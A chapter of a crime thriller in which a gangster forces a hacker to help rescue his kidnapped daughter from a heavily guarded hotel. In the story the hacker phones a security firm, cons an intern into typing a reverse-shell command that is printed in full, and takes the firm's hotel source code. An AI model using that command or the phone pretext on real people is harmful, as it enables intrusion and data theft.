<div class="chapsection">
<p>
<em><span class="caplead">Thump-Thump! thump thump!</span> Thump-thump thump… </em>
</p>
<p>
Danny vaguely recognized the music.
</p>
<p>
His eyes opened slowly. The angle of the daylight hinted at an hour well past noon.
</p>
<p>
His shoulder wound flared with pain as he stirred awake, and his hand still stung from the burn. His injuries served as unavoidable reminders of the horrors of the previous day.
</p>
<p>
But a trail of thin claw-marks on his chest reminded him that yesterday hadn’t been <em>all</em> bad after all.
</p>
<p>
He stood up and donned pajamas, taking his time. He no longer had a job to show up late for. Most importantly, he had a brilliant and beautiful young woman playing <em>Dance Dance Revolution</em> in the next room.
</p>
<p>
As he opened the bedroom door, the stench of acetone and kerosene stung his nostrils. The kitchen still contained the cluttered trappings of an impromptu biochemical laboratory. Near the sink, he noticed several new items: metal buckets with stirring rods alongside bottles of nail polish remover, industrial-strength drain cleaner, and heating oil.
</p>
<p>
The music stopped.
</p>
<p>
“If you see your shadow,” said Tina, “do we get six more weeks of winter?”
</p>
<p>
“Good morning,” Danny croaked. “Or afternoon. How long was I out?”
</p>
<p>
“It’s almost three. I was getting bored!”
</p>
<p>
“So… I’m starving. I see you’ve been cooking?”
</p>
<p>
“Eating anything in here would be an astonishingly bad idea,” she replied.
</p>
<p>
“And here I was looking forward to a nice hearty bacteria stew. How’s the broth doing?”
</p>
<p>
“See for yourself!” Tina gestured at the pot with the flourish of a game show host.
</p>
<p>
Danny lifted the lid and was assaulted by the fetid sink of brackish swamp water. He took one look at the blobs of slime bobbing in the rancid yellow-brown soup and slammed the pot closed again. 
</p>
<p>
“It’s in an exponential growth phase. The bacteria can double their population every half hour.”
</p>
<p>
Danny worked the math. “So after ten hours… That tiny speck you started with has multiplied by a factor of over a million by now. That’s… a lot.”
</p>
<p>
“That’s biology!”
</p>
<p>
Danny chuckled. “Proud of yourself, are you?”
</p>
<p>
“Well, I damn well should be! I’ve been stuck behind a reception desk for almost two years, when what I really should have been doing is <em>this</em>! Behold my awesome powers!” She lifted her head theatrically and splayed her black-nailed fingers.
</p>
<p>
Danny pulled her close. She wrapped her arms around his waist. “So, when will we know if it works?” he asked. “If it actually makes the… you know… the drug?”
</p>
<p>
“We already do.” She looked toward the kitchen counter. 
</p>
<p>
Danny followed her gaze. On the countertop, between the scattered glassware, several delicate parallel lines of fine white powder stood out against the black granite.
</p>
<p>
“I did some shopping while you were asleep,” said Tina. “I picked up glutamate from Super Supplements. Everything else I found at Home Depot. I paid for everything with cash, so there’s no trail. Hanging out with you freaky hacker guys is teaching me a thing or two.”
</p>
<p>
“You know something?” he said with a devilish smirk. “I’m beginning to think that you’re kind of smart. For a girl, anyway.”
</p>
<p>
She pressed her body against his. “You’re a dick.”
</p>
<p>
Their lips met in a kiss that broke his mind free of the bonds of gravity.
</p>
<p>
In a voice soft and breathy, Tina asked him, “Have you ever tried it, by the way?”
</p>
<p>
“Tried what?” he asked as he kissed his way down her neck. 
</p>
<p>
“Cocaine.”
</p>
<p>
“Me? No. No way. Have you?”
</p>
<p>
“Eh, I’ve indulged,” she said, her fingertips running along his back. “But I think my clubbing days are behind me.”
</p>
<p>
He turned his attention to her earlobe. “What does it feel like?” he whispered between nibbles.
</p>
<p>
“Kind of like this.”
</p>
<p>
“I’m definitely never, ever going to touch the stuff, then.”
</p>
<p>
“What, you don’t like it?” she teased.
</p>
<p>
“I’d never be able to stop.”
</p>
<p>
Kissing continued, growing more vigorous. Fingers glided through hair and brushed across skin. A bra strap slid down over a shoulder. 
</p>
<p>
The doorbell rang.
</p>
<p>
Danny tried to ignore it. It rang again. “Did you order pizza or something?” he asked.
</p>
<p>
Tina shook her head.
</p>
<p>
“It’s probably some Jehovah’s Witnesses. Don’t go anywhere.” With a final kiss, Danny reluctantly headed for the door.
</p>
<p>
The peephole showed nobody outside. “What the hell?” Confused, he flipped the deadbolt, turned the knob, and began pulling. “Hello…?”
</p>
<p>
An immense dark blur hurled through the doorway, thrusting the door back against Danny. He fell backward, landing hard on the smooth wood floor.
</p>
<p>
He looked up, and found himself staring into the long black barrel of a handgun. And on the other side of that gun, silhouetted in the doorway, towered the massive shape of Sergey Mukhayev.
</p>
<p>
Danny scurried backwards. Sergey followed, matching the pace of Danny’s scuttles with a slow, relentless footfall. He kept the gun pointed squarely between Danny’s eyes as he marched into his home like a stone golem. Without breaking his gaze, he kicked the front door of the house closed behind him. 
</p>
<p>
Tina screamed. There was a metallic rummaging commotion from the kitchen. She stood holding a large knife with both hands, pointing it at Sergey with as much menace as she could muster &mdash; which was not a lot.
</p>
<p>
Sergey ignored her entirely. He towered over Danny like an enraged colossus and snarled, “Get up!”
</p>
<p>
Danny whimpered, and struggled to his feet. “How… How did you…”
</p>
<p>
He grabbed Danny by the throat and pinned him against the wall. “You…” Sergey seethed. “It is all you! I am up in this ass because of you! You nearly killed my nephew. Twice. You tricked me into ordering lockdown. You blew up my factory, got one of my soldiers killed, got another badly wounded. And I am running out of cars!”
</p>
<p>
“I… I’m sorry!” Danny squeezed out through his constrained larynx.
</p>
<p>
Sergey looked at him with an expression typically used for things stuck to the bottom of a shoe. “I have only one thing now. One thing I am left with.” Sergey shoved the muzzle of the gun against Danny’s chest. “You. I have you. And you do not look like much. But I know you are one clever little shit. And, God willing, maybe that will be enough.”
</p>
<p>
Danny felt the gun pressing into his ribs. It was shaking.
</p>
<p>
And as Sergey looked into his eyes, Danny noticed something beyond the rage, deeper than the contempt. It was unbelievable, but unmistakeable: the man holding Danny’s life literally in his hand was terrified.
</p>
<p>
“I would love nothing more,” said Sergey, “than to kill you right now, clean and easy. But I need you to save my daughter.”
</p>
</div>

<div class="chapsection">
<p>
<span class="caplead">Danny dropped hard into the chair</span> at the computer desk in his bedroom.
</p>
<p>
Sergey leaned down over his shoulder. “We will have no funny business, understand? I know you will find some sneaky way to use computer to call for help. Well, let me tell you something. If I hear anybody come to this house… Anybody! Police. Friend. Neighbor. Newspaper delivery boy. Even stray cat. …Then I shoot you dead that moment. I will not even think about it. And then I will use her…” He gestured to Tina behind him. “…as hostage for me to escape. I am being clear to you?”
</p>
<p>
“Crystal,” Danny squeaked.
</p>
<p>
Sergey warily eyed the windows on Danny’s large monitor. “What kind of computer is this, anyway? It is not Windows, it is not Mac…”
</p>
<p>
“It’s Ubuntu,” Danny answered.
</p>
<p>
“This is what computer hackers use?”
</p>
<p>
“Actually, yeah…” 
</p>
<p>
The Russian snorted. “Well then! Start it! Do the hacking!”
</p>
<p>
Danny stared blankly at the screen. “It… Um… It’s not… It doesn’t work like that… You’ve got to give me something to go on. Some kind of lead. What’s her name? Where was she last seen? How old is she?”
</p>
<p>
“Twelve. She was at her dancing school. Teachers said she left for lunch and never came back.”
</p>
<p>
“So she’s just cutting class?” Danny asked. As soon as he had said it, he flinched, expecting a fist to the temple and a loud Russian-accented lecture about Sergey’s precious little angel being the sweetest, most well-behaved cherub in all of God’s Creation.
</p>
<p>
What he heard instead was a stifled chuckle. “You have raised a daughter?” said Sergey. Danny shook his head. “It is true, she is always trying to get away with trouble. Just like her old man. But… There is a man in the city today. Old business colleague. Things went very bad between us many years ago. And in this business, when things go bad…” 
</p>
<p>
“I see…,” Danny said, wincing. He opened a web browser, bringing up the plain white expanse of the Google search page. “Let’s start with the obvious. What’s this man’s name?”
</p>
<p>
“He is called Ivan Zheleznov,” said Sergey. “In English, you write it ‘Z’, ‘h’…”
</p>
<p>
Tina said, “Wait, Iv&mdash;?” She promptly cut herself off.
</p>
<p>
They both turned to her. Sergey asked pointedly, “You have heard about him?”
</p>
<p>
Tina reluctantly replied, “Is he from Saint Petersburg? Super rich? Owns companies all over the world?”
</p>
<p>
“Yes!” said Sergey. “You know this man?”
</p>
<p>
Tina said, “He’s staying at the Medina Gallante, in the Presidential Suite.”
</p>
<p>
Danny asked, “The big fancy lakeside hotel between Mercer and the 520 bridge?”
</p>
<p>
Tina nodded.
</p>
<p>
Danny turned back around to the computer and started typing.
</p>
<p>
Sergey continued staring at her. “How do you know this!?”
</p>
<p>
“I’m the one that booked the reservation.”
</p>
<p>
Sergey squinted in confusion for a few moments. “Oh! I know you now. You are office girl from Tungsten! We talked on telephone! Your name is Tina, yes?”
</p>
<p>
Tina nodded. “Yeah.”
</p>
<p>
Sergey added, “You busted Eugene’s lip with old computer keyboard.”
</p>
<p>
Tina turned her head away, looked innocently upward, and said, “Maybe.”
</p>
<p>
Danny browsed the hotel’s website. The screen showed a high-resolution slide show of large cedarwood rooms with floor-to-ceiling windows, a steak-and-seafood restaurant, and panoramas of mountains and evergreen forests.
</p>
<p>
“Christ, this place is <em>sick</em>,” said Danny. “It’s got its own boat dock in Lake Washington &mdash; they let guests take their yachts out for a spin. …Authentic Finnish saunas in the gym …And a helicopter pad on the roof, so guests can fly directly from Sea-Tac Airport on rental choppers.”
</p>
<p>
Sergey grabbed Danny by the arm. “He is in this place right now? Let’s go! We come to my home first, get weapons, get Eugene and Leo, then we get Rosie!”
</p>
<p>
Danny struggled against his pull. “Jesus, no! Sergey, that’s suicide! Look, the kind of people that stay at a hotel like this, they’re very high rollers. We’re talking ambassadors, heads of state, officers of multinational corporations… My point is, the security in a place like this is going to be state-of-the-art.”
</p>
<p>
“This does not scare me,” Sergey shrugged.
</p>
<p>
“It should,” replied Danny. “Let me put it in perspective for you. This hotel is in Medina &mdash; one of the richest districts in the country, and all the money is from technology. Bill Gates’s house is there. Jeff Bezos &mdash; the guy who created Amazon &mdash; <em>his</em> house is there. They have marine radar systems watching the shoreline to call out the Coast Guard if so much as a floating beach ball gets within 500 feet of anyone’s deck. They have cameras on every street corner that use image recognition software to scan every car that drives through the neighborhood. And this is just what it’s like on <em>public</em> property. Inside that hotel, there’s going to be world-class physical security systems, full-time guards, hotlines to SWAT teams, you name it. If you go in with guns blazing, you’ll be mowed down before you make it through the lobby.”
</p>
<p>
“So what do you suggest?” asked Sergey.
</p>
<p>
“I don’t know,” said Danny. “Let me think…”
</p>
<p>
Danny stared at the screen, clicking at random on the web page, looking for leads.
</p>
<p>
Tina spoke up behind them. “Can I ask why is this so complicated? Why don’t you just call the police?”
</p>
<p>
Sergey looked at her with frustration. “Do you think police would help <em>me</em>? Local police want to catch me for very long time. Even if miracle happened and they rescued her from Ivan, you know what they do then? Use her as bargaining chip against me. They make up some reason to put her in foster care, make sure I never see her again, pressure me to turn myself in. Do you know what kind of life is for girl her age in foster system? No, this is not what will happen to my Rosie!” 
</p>
<p>
Danny’s face was buried in the screen. “Guys, I think I have an idea.”
</p>
<p>
“What is your plan?” asked Sergey.
</p>
<p>
“Well, the hotel’s security system must’ve been built by somebody…”
</p>
<p>
Sergey paused. “And…?”
</p>
<p>
“Well, the process by which people build things is… Hold on, give me a minute…” Armed again with a Google search page, Danny typed:
</p>

<pre class="computer">
"press release" contract security "Medina Gallante"
</pre>

<p>
He scanned the results, dismissing most of them, investigating others. He altered the search query several times. He tried the Wayback Machine, LexisNexis, and a dozen different business blogs.
</p>
<p>
He eventually found what he was looking for. Buried in a tech entrepreneur newsletter from several years prior, there appeared a blurb:
</p>

<div class="computer email">
SAN JOSE, CA &mdash; Carlos Gaeta, President of RockBox Digital Security Systems Co., is proud to announce the signing of a $17.2M contract with the luxury hotel Medina Gallante of Seattle, WA. RockBox will be providing a comprehensive package of digital security solutions, including full integration with the hotel’s reservation, billing, and access management systems.
<br/>
<br/>
</div>

<p>
“RockBox Digital Security Systems, in San Jose, California,” Danny noted aloud.
</p>
<p>
Several more minutes of study armed him with information about RockBox. From industry reports, press releases, and LinkedIn, he deduced that the company was about ten years old and had about 50 workers, about a dozen of whom were engineers. The company’s website listed its phone number.
</p>
<p>
Danny reached for his cellphone, plugged into a charger on his desk.
</p>
<p>
A mighty backhand upside his head nearly knocked him out of his chair.
</p>
<p>
“Ow! What the fuck!” he howled.
</p>
<p>
Sergey glared at him. “What do you think you are doing? You think I let you make telephone call?”
</p>
<p>
“I’m doing what you came to me for!” Danny insisted. He pointed to one of the dozens of browser windows on his screen. “See that post? That’s from a job board at UCLA. It’s advertising a summer internship position at the company that built the Gallante’s security system. This gives me an idea. Now, should I sit here talking about it, or can I <em>show</em> you instead?”
</p>
<p>
“Fine. But you must keep it on speakerphone.”
</p>
<p>
Danny nodded and began dialing.
</p>
<p>
Sergey watched Danny work the phone, and narrowed his eyes. “What is strange code you are putting before the phone number?”
</p>
<p>
“It’s star-six-seven. It blocks caller ID. Now, quiet, it’s ringing.”
</p>
<p>
An older woman’s voice greeted the line. “RockBox Digital Security. How may I direct your call?”
</p>
<p>
Danny took a deep breath and closed his eyes. In a tone of friendly familiarity, he said, “Hi there. I understand you have a summer intern in your engineering department?”
</p>
<p>
“Whom may I say is calling?” said the woman.
</p>
<p>
Danny was thankful she couldn’t see his eyes darting nervously. “This is Danny, with Clay… uh… Prismatic Creations. We’re subcontractors. Your intern was helping us, um, look something up…”
</p>
<p>
The woman issued a perfunctory, “Please hold.” A few moments later, a young man answered, “Hello?”
</p>
<p>
Danny imitated the gruff, irritated tone of an overtasked worker. “Have you run this week’s spline reticulation process yet?”
</p>
<p>
“I… Uh… I’m sorry, I’m not sure what that… um…” the young man fumbled. His voice was squeaky with adolescence.
</p>
<p>
“You’re the intern, right?” said Danny. “Part of the intern’s job is to keep the server’s splines reticulated. How long have you been there?”
</p>
<p>
“Only two weeks, sir!” the youth said, audibly terrified. “I don’t… Um… How am I supposed to… uh… What do I…?”
</p>
<p>
“It’s alright. Obviously nobody’s shown you how to do it yet,” said Danny. “Don’t feel bad. I’ll walk you through it, alright?”
</p>
<p>
“Okay, sir…”
</p>
<p>
“What kind of computer is your workstation?” Danny asked. “Windows? Mac? Linux?”
</p>
<p>
“Mac. Is that okay?” 
</p>
<p>
Danny smiled. “It’s perfect…” He laid his hands upon his keyboard and began working. “Give me just a minute to prepare the server…” A few large black windows opened on his computer screens. His typing sent rows of text cascading down his display. After about a minute, he said into the phone, “Now, I need you to open a terminal window. You know what a terminal window is, right? It’s under Applications, Utilities. Then type the following command exactly as I say it…”
</p>

<pre class="computer">
exec /bin/sh 0&lt; /dev/tcp/69.17.116.124/1337 1&gt;&amp;0 2&gt;&amp;0
</pre>

<p>
On the other end of the line, the intern dutifully repeated the code.
</p>
<p>
Messages began appearing in the windows on Danny’s display. He silently pumped his fist in a muted cheer of victory.
</p>
<p>
The young man squawked, “Did it work? It doesn’t look like it’s doing anything…”
</p>
<p>
“Oh, it’s doing stuff, alright!” Danny assured. “Don’t close that window, okay? I’ll terminate it when… I mean, it’ll terminate on its own when it’s done. Just leave it open. Thank you, young man! Have an <em>excellent</em> career!” He ended the call.
</p>
<p>
Sergey stared at him in confusion. “What the hell was that?”
</p>
<p>
Danny, interlacing his words with his keystrokes, replied, “That was me teaching some poor kid a valuable life lesson about trusting strangers on the phone. The command I had him type opened a reverse shell &mdash; it gave me a back door into his workstation. I’m taking all his console output, bouncing it through a webserver at Claymore Communications, and piping it over to my terminal here. From his point of view, all he sees is a frozen window. But <em>here</em>, on <em>my</em> screen, I’m controlling his machine from remote. Check it out. Here’s all the files in his home directory. Here’s all his running processes. Oh hey, look! Here’s an SVN repository! And <em>here</em>…”
</p>
<p>
Sergey interrupted the geekspeak. “How is any of this helping get back my Rosie?”
</p>
<p>
Danny moved his mouse cursor over a block of text. It read, “<span class="computer">Medina Gallante</span>”. “See this folder? It contains all of RockBox’s digital assets for the Gallante account. It’s got PDFs of the Gallante’s floor plans. User manuals. All of the source code for the software that runs the hotel &mdash; keycards, cameras, reservations, utilities…”
</p>
<p>
Sergey asked, “And with this you can get me into hotel?”
</p>
<p>
“With this, we can perform whitebox analysis of their integrated security framework,” Danny explained. “We can study how the engineers of this system went about building it, and read notes that they left for themselves in the comments of their code. By examining their unit tests, we’ll see which parts of the system they paid extra attention to &mdash; and which parts they didn’t. We can study the message-passing framework between different subsystems, and&mdash;”
</p>
<p>
Sergey wrung his hands in frustration. “What is any of this <em>mean</em>?”
</p>
<p>
“It means we might be able to find a flaw and exploit it. And, if the flaw is bad enough, maybe even take over the entire system. No code project is ever completely free of defects, especially not one with this many different components and built by this many different people. There has to be a chink somewhere in this armor. We just have to find it.”
</p>
<p>
“You need how much time to do this?” Sergey demanded. “A day? Two?” 
</p>
<p>
Danny laughed humorlessly. “Sergey, something like this could take months.”
</p>
<p>
“You are full of shit,” Sergey grumbled.
</p>
<p>
Danny loaded one of the source code files into an editor and expanded it full-screen. Countless multicolored blocks of text overwhelmed the display. “Can <em>you</em> read that?”
</p>
<p>
“This is what you are for,” Sergey retorted.
</p>
<p>
Danny shook his head. “Looking for defects in source code is a very specialized art. I can’t do this alone. I need to bring more people in.”
</p>
<p>
Sergey looked at him coldly. “There is no other choice, is there?” He slowly bowed his large head, remaining silent for several long seconds. “I have no way to make you cooperate,” he finally growled, almost choking on the words. “I know if I let you reach help, you will think your way around any threat I can make. Maybe you will call police. Maybe you will run away. You are smart. That is entire reason why I need you. And that is also reason why I cannot control you.” He looked up at Danny. His eyes were reddened and moist. “This is my daughter. Zheleznov has stolen her. Do you know what he plans to do to her? Daniel… Please… <em>You must not let him take her back to Saint Petersburg!</em>”
</p>
<p>
Danny gulped, and looked him in the eye. “If… <em>If</em> I agree to help you… I would <em>only</em> do it for the sake of your daughter.”
</p>
<p>
In a tone so low that it was almost inaudible, Sergey said, “As long as you do it.” He swept his thick arm in the direction of Danny’s phone. “You need help for this hacking? Go get it.”
</p>
<p>
Danny nodded. “I know just the men for the job.”
</p>
</div>
